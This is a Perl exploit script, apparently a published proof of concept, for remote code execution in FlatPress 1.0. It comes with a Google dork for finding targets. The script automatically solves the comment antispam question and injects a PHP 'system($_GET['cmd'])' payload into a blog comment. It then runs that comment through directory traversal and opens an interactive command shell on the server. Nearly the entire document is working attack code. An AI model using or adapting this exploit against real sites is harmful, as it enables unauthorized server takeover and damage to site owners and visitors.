Flatpress 1.0 Traversal / Command Execution

`#!/usr/bin/perl  
# Exploit Title: Flatpress remore code execution PoC NULLday  
# Google Dork: This site is powered by FlatPress.  
# Date: 17/10/2013  
# Exploit Author: Wireghoul  
# Vendor Homepage: http://flatpress.org/home/  
# Software Link:  
http://downloads.sourceforge.net/project/flatpress/flatpress/FlatPress%201.0%20Solenne/flatpress-1.0-solenne.tar.bz2  
# Version: v1.0  
#  
# Blended threat, executes code injected into comment  
# by loading comment as a page through directory traversal  
# Requires the inlinePHP plugin to be enabled.  
# Written by @Wireghoul - justanotherhacker.com  
#  
# This is for my peeps and the freaks in the front row -- Hilltop Hoods:  
Nosebleed section  
  
use strict;  
use warnings;  
use LWP::UserAgent;  
  
&banner;  
&usage if (!$ARGV[0]);  
my $injid = 'Spl0ited'.int(rand(9999));  
my $ua = LWP::UserAgent->new;  
$ua->timeout(10);  
$ua->env_proxy;  
$ua->cookie_jar({ file => "tmp/flatpress-rce.txt" });  
  
sub banner {  
print "\nFlatpress remote code execution PoC by \@Wireghoul\n";  
print "=======================[ justanotherhacker.com]==\n";  
}  
  
sub usage {  
print "Usage: $0 <url>\n";  
exit;  
}  
  
my $response =  
$ua->get("$ARGV[0]/fp-plugins/inlinephp/plugin.inlinephp.php");  
if (!$response->is_success) {  
print "[-] Inline PHP plugin not found at  
$ARGV[0]/fp-plugins/inlinephp/plugin.inlinephp.php\n";  
} else {  
print "[+] Inline PHP plugin found, hopefully it is enabled!\n";  
}  
# Prepare for exploitation, find entry + comment location  
$response = $ua->get($ARGV[0]);  
if ($response->is_success) {  
if ($response->decoded_content =~  
/(http.*?x=entry:entry.*?;comments:1#comments)/) {  
my $cmntlink = $1;  
print "[+] Found comment link: $cmntlink\n";  
my $aaspam = 0; # Can't be bothered solving easy captchas, just  
reload page until we get one we like  
while ($aaspam == 0) {  
$response = $ua->get($cmntlink);  
if ($response->decoded_content =~ /<strong>(\d+) plus (\d+) \?  
\(\*\)/) {  
$aaspam = $1+$2;  
print "[+] Defeated antispam $1 + $2 = $aaspam\n";  
} else {  
$response->decoded_content =~ m/<strong>(.*) \? \(\*\)/;  
print "[*] Unknown antispam: $1 ... retrying\n";  
}  
}  
# Post a comment  
$response = $ua->post(  
$cmntlink."form",  
Content => {  
'name' => $injid,  
'email' => '',  
'url' => '',  
'aaspam' => $aaspam,  
'content' =>  
"SHELL[exec]system(\$_GET['cmd']);[/exec]LLEHS",  
'submit' => 'Add',  
}  
);  
$response = $ua->get($cmntlink);  
# Find link to injected content, then execute psuedo shell in loop  
my @cmnts = split (/<li id="comment/, $response->decoded_content);  
my @injected = grep /$injid/, @cmnts;  
if ($injected[0] =~ /$injid/) {  
print "[+] Injection ($injid) successful\n";  
$injected[0] =~  
m/(http.*?)x=entry:entry(\d\d)(\d\d)(\d\d-\d+);comments:1#comment(\d+-\d+)/;  
my  
$shell="$1page=../../content/$2/$3/entry$2$3$4/comments/comment$5";  
print "[*] Dropping into shell, type exit to exit\n";  
my $line='';  
while (1) {  
print '$';  
$line=<STDIN>;  
if ($line =~ /^exit$/) { exit; };  
my $output=$ua->get("$shell&cmd=$line");  
$output->decoded_content =~ /SHELL(.*)LLEHS/ms;  
my $clean = $1; $clean =~ s/<br \/>//g;  
print "$clean\n";  
}  
} else {  
print '[-] Unable to identify the injection point';  
}  
} else {  
print "[-] Comment link not found\n";  
}  
} else {  
die $response->status_line;  
}  
`